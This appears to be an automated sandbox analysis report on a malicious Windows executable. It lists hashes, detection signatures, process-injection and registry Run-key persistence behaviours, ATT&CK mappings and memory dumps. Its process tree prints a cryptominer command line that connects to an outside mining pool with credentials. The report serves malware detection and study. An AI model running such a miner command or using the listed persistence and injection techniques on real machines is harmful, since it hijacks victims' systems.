Analysis

  • max time kernel
    161s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    12-07-2022 16:18

General

  • Target

    4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe

  • Size

    423KB

  • MD5

    465684a387882a2967ab06480bbd5e41

  • SHA1

    ca5de6208c51538cfd9658db7831194fc4ee928a

  • SHA256

    4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0

  • SHA512

    bab8fa9a91a88ea7bdd814d2b0046586c7d4b845d750af00b50b147db3b25ba4fabc3bacc2f78b1cd361c45ed585f0cd69d7c3ac7a9b21bfa4ecbbcc42d4b088

Score
10/10

Malware Config

Signatures

  • suricata: ET MALWARE DNS Reply Sinkhole - Microsoft - 199.2.137.0/24

    suricata: ET MALWARE DNS Reply Sinkhole - Microsoft - 199.2.137.0/24

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe
    "C:\Users\Admin\AppData\Local\Temp\4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3360
    • C:\Users\Admin\AppData\Local\Temp\4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe
      NdxUsil.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:4812
    • C:\Users\Admin\AppData\Local\Temp\4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe
      NdxUsil.exe
      2⤵
      • Adds Run key to start application
      PID:3892
    • C:\Users\Admin\AppData\Local\Temp\4990dab91421d71f4008a56b6286d389ee0ad1291aa6c52eb5265181a83a6dd0.exe
      bitcoin-miner.exe -a 60 -l no -o http://kdusd.cantvenlinea.biz:1942/ -u zephyr.oioioioioioioioi -p Nu778800
      2⤵
        PID:4240

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3360-134-0x0000000000400000-0x000000000046F000-memory.dmp
      Filesize

      444KB

    • memory/3360-135-0x0000000000700000-0x000000000076F000-memory.dmp
      Filesize

      444KB

    • memory/3892-141-0x0000000000400000-0x0000000000404000-memory.dmp
      Filesize

      16KB

    • memory/3892-137-0x0000000000400000-0x0000000000404000-memory.dmp
      Filesize

      16KB

    • memory/3892-142-0x0000000000400000-0x0000000000404000-memory.dmp
      Filesize

      16KB

    • memory/3892-136-0x0000000000000000-mapping.dmp
    • memory/4240-144-0x00000000004F0000-0x000000000053C000-memory.dmp
      Filesize

      304KB

    • memory/4240-138-0x0000000000000000-mapping.dmp
    • memory/4240-140-0x0000000000400000-0x000000000053C000-memory.dmp
      Filesize

      1.2MB

    • memory/4240-143-0x00000000004F0000-0x000000000053C000-memory.dmp
      Filesize

      304KB

    • memory/4240-145-0x0000000000400000-0x000000000053C000-memory.dmp
      Filesize

      1.2MB

    • memory/4240-146-0x0000000000400000-0x000000000053B37A-memory.dmp
      Filesize

      1.2MB

    • memory/4240-147-0x0000000000400000-0x000000000053B37A-memory.dmp
      Filesize

      1.2MB

    • memory/4240-149-0x0000000000400000-0x000000000053B37A-memory.dmp
      Filesize

      1.2MB

    • memory/4240-148-0x0000000000400000-0x000000000053B37A-memory.dmp
      Filesize

      1.2MB

    • memory/4240-152-0x0000000000400000-0x000000000053B37A-memory.dmp
      Filesize

      1.2MB

    • memory/4812-130-0x0000000000000000-mapping.dmp
    • memory/4812-131-0x0000000000400000-0x0000000000403000-memory.dmp
      Filesize

      12KB

    • memory/4812-133-0x0000000000400000-0x0000000000403000-memory.dmp
      Filesize

      12KB